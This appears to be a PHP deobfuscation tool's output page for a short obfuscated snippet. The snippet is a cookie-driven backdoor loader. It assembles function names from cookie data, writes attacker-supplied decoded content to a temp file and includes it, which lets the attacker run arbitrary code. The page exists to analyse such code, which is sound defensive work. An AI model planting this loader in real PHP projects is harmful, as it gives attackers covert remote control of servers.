Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

$c=$_COOKIE;$k=0;$n=3;$p=array();$p[$k]='';while($n){$p[$k].=$c[12][$n];if(!$c[12][$n+1]){..

Decoded Output download

<?  $c=$_COOKIE;$k=0;$n=3;$p=array();$p[$k]='';while($n){$p[$k].=$c[12][$n];if(!$c[12][$n+1]){if(!$c[12][$n+2])break;$k++;$p[$k]='';$n++;}$n=$n+3+1;}$k=$p[16]().$p[19];if(!$p[26]($k)){$n=$p[4]($k,$p[14]);$p[21]($n,$p[18].$p[28]($p[9]($c[3])));}include($k); 
 ?>

Did this file decode correctly?

Original Code

$c=$_COOKIE;$k=0;$n=3;$p=array();$p[$k]='';while($n){$p[$k].=$c[12][$n];if(!$c[12][$n+1]){if(!$c[12][$n+2])break;$k++;$p[$k]='';$n++;}$n=$n+3+1;}$k=$p[16]().$p[19];if(!$p[26]($k)){$n=$p[4]($k,$p[14]);$p[21]($n,$p[18].$p[28]($p[9]($c[3])));}include($k);

Function Calls

None

Variables

$c 0
$k 0
$n 3
$p [{'key': 0, 'value': ''}]

Stats

MD5 99a071f78ebd4311f85b1294f7c7c571
Eval Count 0
Decode Time 117 ms